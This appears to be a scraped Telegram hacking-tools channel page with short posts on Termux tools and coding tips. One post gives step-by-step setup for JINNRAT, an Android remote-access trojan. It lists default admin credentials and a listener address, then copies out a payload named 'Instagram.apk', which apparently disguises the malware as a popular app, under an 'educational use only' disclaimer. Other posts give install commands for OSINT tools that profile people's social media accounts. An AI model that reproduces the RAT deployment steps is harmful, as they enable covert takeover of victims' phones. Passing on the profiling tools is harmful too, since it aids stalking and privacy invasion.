TERMUX COMMANDD
25.5K subscribers
551 photos
80 videos
10 files
156 links
πŸ₯‡THIS IS THE TOP TERMUX CHANNEL ON TELEGRAM WITH 1000+ TOOLSπŸͺ©

πŸšͺHOUSE OF PENTESTER

⚑ Β©ALL CONTENT PROVIDED BY THIS CHANNEL IS MEANT FOR EDUCATIONAL PURPOSES ONLYπŸ”Ί


ADS - @MARONADS
Download Telegram
Linux Architecture
❀12
JINNRAT - Remote Android Managment Suite

git clone https://github.com/alvinbaby/JINNRAT
cd JINNRAT
bash setup.sh

bash setup.sh

http://localhost:22533

username : admin
password : root

ls

cd JINNRAT

ls

bash setup.sh

Then click 3 after installation done after click 1 copy link I'd password

Then in In ip paste : 127.0.0.1
Port: 22222

then ctrl C after

ls

cd app

ls

cp Instagram.apk

Done


⚠️ Educational use only. Unauthorized or illegal use is strictly prohibited.

⚠️ For more information and use of this tool in termux visit github link of this tool.
πŸ‘¨β€πŸ’»  @TERMUXCOMMANDD
❀26
How to Learn Backend Development?
❀7πŸ‘¨β€πŸ’»2
JavaScript array methods
❀8πŸ‘3
Comment below the output! πŸ˜ƒπŸ‘‡
❀10
Search for a username across hundreds of social networks.

git clone
https://github.com/p1ngul1n0/blackbird
❀7πŸ‘3
πŸ€©πŸ€©πŸŽ†New year. New strength. New opportunities.
Wishing you a year that changes everything for the better.
πŸŽ„2️⃣0️⃣2️⃣6️⃣
Please open Telegram to view this post
VIEW IN TELEGRAM
❀7πŸ‘2
Well Known TCP&UDP Ports
❀8πŸ‘1
Toutatis is a little-known Instagram OSINT tool used to collect public profile data, metadata, posts, captions, hashtags, and digital footprint.
No hacking, public data only β€” good for OSINT & research learning.


pkg update -y && pkg install git python -y && pip install --upgrade pip && git clone https://github.com/megadose/toutatis.git && cd toutatis && pip install -r requirements.txt

python3 toutatis.py

⚠️ For more information and use of this tool in termux visit github link of this tool.
πŸ‘¨β€πŸ’»  @TERMUXCOMMANDD
❀16πŸ‘Ž3πŸ’―3πŸ‘1πŸ‘1
Array Methods
πŸ‘4❀1
HTML Tip πŸ’‘

You can use the accept attribute to specify the types of files accepted by the server (only for file type).

This is used with the <input> element.
❀7πŸ’―2
Cybersecurity Roles for different domains
2❀11
Bash Scripting Basics
❀12
❀6
Try these instead.
❀15
TERMUX COMMANDD pinned Deleted message
Amazon API Gateway: REST API request flow
❀11
This Termux chatbot has two modes:

Offline mode – simple rule-based chatbot (no internet).

API AI mode – smart chatbot using an AI API (internet required).


pkg update && pkg upgrade -y


pkg install python -y

1. Offline Chatbot (No API)

Create file

nano offline_bot.py

2. Copy Code

print("πŸ€– Offline Chatbot (type 'bye' to exit)")

while True:
user = input("You: ").lower()

if user in ["hi", "hello"]:
print("Bot: Hello!")
elif "name" in user:
print("Bot: I am a Termux chatbot.")
elif "how are you" in user:
print("Bot: I'm fine!")
elif user == "bye":
print("Bot: Bye πŸ‘‹")
break
else:
print("Bot: I don't understand.")

3. Run

python offline_bot.py

PART 2: AI Chatbot (API Based)

Install API library

pip install openai

Create AI bot file


nano ai_bot.py

AI Bot Code (API)

from openai import OpenAI

client = OpenAI(api_key="PASTE_YOUR_API_KEY_HERE")

print("πŸ€– AI Chatbot Ready (type exit to quit)")

while True:
user = input("You: ")
if user.lower() == "exit":
break

response = client.chat.completions.create(
model="gpt-3.5-turbo",
messages=[{"role": "user", "content": user}]
)

print("Bot:", response.choices[0].message.content)

Run AI chatbot

python ai_bot.py

πŸ”” EXCLUSIVE CHANNEL
❀25πŸ’―3
Ethernet Cabling Categories!! | IPCisco
❀21
πŸ‘Œ6❀3πŸ’―3